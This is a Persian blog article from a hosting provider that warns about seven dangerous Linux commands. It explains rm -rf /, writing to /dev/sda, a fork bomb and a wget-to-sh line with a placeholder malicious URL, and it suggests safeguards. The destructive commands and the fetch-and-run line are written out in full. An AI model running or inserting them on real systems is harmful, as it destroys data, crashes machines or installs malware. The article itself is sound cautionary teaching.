سرور ساعتی ایران و خارج + تست رایگان

14 دستور پرخطر لینوکس (بخش اول)

در مرکز محتوای سرور دات آی آر

اجرای دستورات در ترمینال لینوکس آسان و سریع است و معمولاً در مقایسه با استفاده از رابط کاربری گرافیکی برای انجام همان کار، تجربه برتری را ارائه می دهد. این دستورات، دسترسی به ویژگی هایی را فراهم می کنند که با رابط کاربری گرافیکی لینوکس در دسترس نیستند، اما اگر مطمئن نباشید دقیقاً چه کاری انجام می دهند، می توانند ریسک بالایی را در بر داشته باشند.

در این مقاله قصد داریم به 14 دستور پر ریسک قابل استفاده در ترمینال لینوکس بپردازیم که استفاده از آنها بدون داشتن دانش کافی از عملکرد آن و یا عدم دقت کافی در اجرای دستور ممکن هست عواقب جبران ناپذیری را در بر داشته باشد.

قبل از مطالعه ی مقاله حتما دقت کنید که این دستورات را به منظور تست در سیستم خود اجرا نکنید زیرا برخی از آنها می توانند به سیستم یا فایل های شما آسیب جدی وارد کنند، داده های شما را بدون هیچ گونه هشدار یا درخواست تاییدی از قبل پاک می کنند.

1 – rm -rf/

دستور rm -rf یکی از سریع ترین راه ها برای حذف یک پوشه و محتویات آن است. اما یک اشتباه تایپی یا ناآگاهی کوچک ممکن است منجر به آسیب غیرقابل جبران سیستم شود. با این حال، گزینه undelete وجود ندارد که باعث می شود فایل های حذف شده برای همیشه از بین بروند. این بدان معناست که استفاده از دستور rm برای حذف دائمی فایل های حساس سیستم باعث اختلال در عملکرد سیستم عامل میگردد.

اجرای دستور rm با پرچم های (ATTRIBUTES)  -r و -f باعث حذف بازگشتی در تمام زیر شاخه ها می شود. اجرای این دستور در دایرکتوری Root سیستم را به طور کامل پاک می کند.

در بعضی توزیع هال لینوکسی بعد از اجرای این دستور مانند تصویر زیر به شما هشدار داده می شود ، و در بعضی توزیع ها نیز هیچ هشداری داده نمی شود و بلافاصله تمامی فایل ها حذف میگردد.

 

 

rm : این دستور برای حذف فایل ها استفاده می شود.

rm r : این دستور به صورت بازگشتی پوشه را حذف می کند، حتی پوشه خالی را.

rm –f : این دستور به صورت فورس بدون گرفتن تایید فایل ها را حذف میکند.

rm -rf / : این دستور به صورت فورس کلیه ی محتوای root را پاک میکند.

rm -rf * : این دستور به صورت فورس کلیه ی محتوای دایرکتوری که در آن دستور اجرا شده است را حذف میکند.

rm -rf . : این دستور به صورت فورس بازهم کلیه ی فولدر ها و ساب فولدر های دایرکتوری که در آن دستور اجرا شده است را کلیه ی فایل های موجود در دایرکتوری حذف میکند.

بنابراین، هنگام اجرای دستور rm -rf مراقب باشید.اما برای جلوگیری از حذف تصادفی فایل با دستور “rm” میتوانید یک نام مستعار از “rm”command به عنوان مثال “rm -i” در فایل “.bashrc” ایجاد کنید، با این کار هر زمان که دستور را اجرا کنید از شما می خواهد که هر حذفی را تایید کنید.

 

2 – Command >/dev/sda

اجرای یک فرمان و الحاق آن با >/dev/sda خروجی فرمان را در بلوک /dev/sda می‌نویسد، یعنی روی هارد دیسک شما. بلوک dev/sda حاوی داده‌های سیستم عامل است که سپس با خروجی فرمان جایگزین می‌شود و به سیستم شما آسیب می‌زند و آن را غیرقابل بازیابی می‌کند. در دستور بالا بخش Command میتواند هر دستور قابل اجرایی در لینوکس باشد.

دستور بالا داده‌های خام را می‌نویسد و تمام فایل‌های روی بلوک با داده‌های خام جایگزین می‌شوند و در نتیجه منجر به از دست رفتن کل داده‌ها در بلوک می‌شود.

3 – :(){:|:&};: Command

دستور fork bomb تابعی به نام : ایجاد می‌کند و محتویات تابع را تعریف می‌کند و باعث می‌شود خودش اجرا شود و به فراخوانی دیگری از خودش وارد شود. بنابراین، تابع در پیش زمینه اجرا می شود در حالی که همان فرآیند را در پس زمینه اجرا می کند. این تابع به طور مکرر خود را اجرا و تکرار می کند و به سرعت تمام منابع سیستم شما را اشغال می کند تا زمانی که سیستم کرش کند.

دستور fork bomb به صورت زیر است:

:(){ :|:& };:

 

بمب فورک را Rabbit Virus یا Wabbit نیز می نامند و در اصل یک حمله DOS است. شما می توانید با محدود کردن سشن مربوط به هر فرایند، در برابر این نوع حمله از سیستم خود دفاع کنید. برای محدود کردن تعداد فرآیند به 5000، میتوانید از دستور  ulimit  به صورت ulimit -S -u 5000 استفاده کنید.

 

4 – mv folder /dev/null

یکی دیگر از دستورات خطرناکی که می توانید به صورت آنلاین پیدا کنید، انتقال یک پوشه یا فایل به /dev/null است. در لینوکس، /dev/null فایلی است که به عنوان “سیاه چاله” شناخته می شود زیرا هر داده ای را که به محل این فایل منتقل می کنید، از بین می برد.

با این حال، از آنجایی که /dev/null یک دایرکتوری نیست، بلکه یک فایل کاراکتری است، mv نمی تواند آن را با دایرکتوری دیگری بازنویسی کند. از طرف دیگر، می توانید یک فایل را به آنجا منتقل کنید و فایل محتوای /dev/null را بازنویسی می کند.

به عنوان مثال با اجرای دستور زیر :

sudo mv /home/{linuser}/employees.txt /dev/null

پس از اجرای این دستور، /dev/null یک فایل معمولی است. خطر ایجاد این تغییر این است که /dev/null هرگز قرار نیست هیچ داده ای را خروجی دهد، و اکنون یک فایل معمولی است. با اشتباه بودن این پیکربندی، می‌تواند منجر به درج داده‌های تصادفی در فایل‌های سیستم شود و منجر به خرابی سیستم شود.

 

mv /home/user/* /dev/null

دستور بالا نیز تمام محتویات پوشه ی یوزر را به /dev/null منتقل میکند و به معنای واقعی کلمه باعث نابودیه کل اطلاعات یوزر می شود.

 

5 – wget http://malicious_source -O- | sh

دستور wget به شما امکان می دهد فایل ها را در ترمینال دانلود کنید. با این حال، این فرمان ممکن است به wget دستور دهد که یک اسکریپت را از یک منبع مخرب دانلود کند و آن را با sh اجرا کند. همیشه به آدرس بسته یا فایلی که دانلود می کنید توجه کنید و مطمئن شوید که منبع قابل اعتمادی است، در غیر این صورت خطر آلوده شدن سیستم شما همواره ممکن هست.

6 – > file

فرمان > file مخفف cat /dev/null > file است. تغییر مسیر یک دستور به یک فایل می تواند دستور کاربردی باشد همانطور که دستور های معرفی شده تا الان نیز کاربردی بودند، اما اشتباه در دستور یا اجرای بی دقت دستور می تواند یک فایل سیستمی مهم را پاک کند. فرمان > file از ویژگی تغییر مسیر bash برای حذف محتویات فایل استفاده می کند. علاوه بر این، اضافه کردن یک اسپیس قبل از دستور از نمایش آن در لاگ  ترمینال جلوگیری می کند. این به این معنی است که شخصی می تواند فایل های شما را حذف کند و اگر قبل از دستور با یک فاصله خالی باشد، هیچ لاگی هم ثبت نمی شود.

اگر دستور بالا با اشتباه تایپی یا ناآگاهی مانند “> xt.conf” اجرا شود، فایل پیکربندی یا هر سیستم یا فایل پیکربندی دیگری را می‌نویسد.

 

7 – history | sh

دستور  history | shمیتواند دستور خطرناکی باشد زیرا هر دستوری که آخرین بار اجرا کرده اید را مجددا اجرا می کند. این عمل می تواند باعث بی ثباتی سیستم شود و دستوراتی را که نمی خواستید دوباره اجرا کنید را اجرا کند.

در مقاله ی بعدی با 7 دستور پر خطر دیگر آشنا خواهیم شد با تشکر از همراهی شما.

 

اشتراک گذاری در linkedin

به تیم متخصص ما اعتماد کنید!

تخفیف مخاطبین مرکز محتوا: Blog01

از کد Blog01 می‌تونید برای خرید اشتراک خدمات سرور مجازی و هاست استفاده کنید و از %10 تخفیف تو سفارش این خدمات بهره‌مند بشید!

محتوای مقاله مفید بود؟

5 1 رای
این مقاله چطور بود؟
اشتراک در
اطلاع از

0 دیدگاه
بازخوردهای آنلاین
مشاهده همه دیدگاه ها

به تیم متخصص ما اعتماد کنید!

تخفیف مخاطبین مرکز محتوا: Blog01

از کد Blog01 می‌تونید برای خرید اشتراک خدمات سرور مجازی و هاست استفاده کنید و از %10 تخفیف تو سفارش این خدمات بهره‌مند بشید!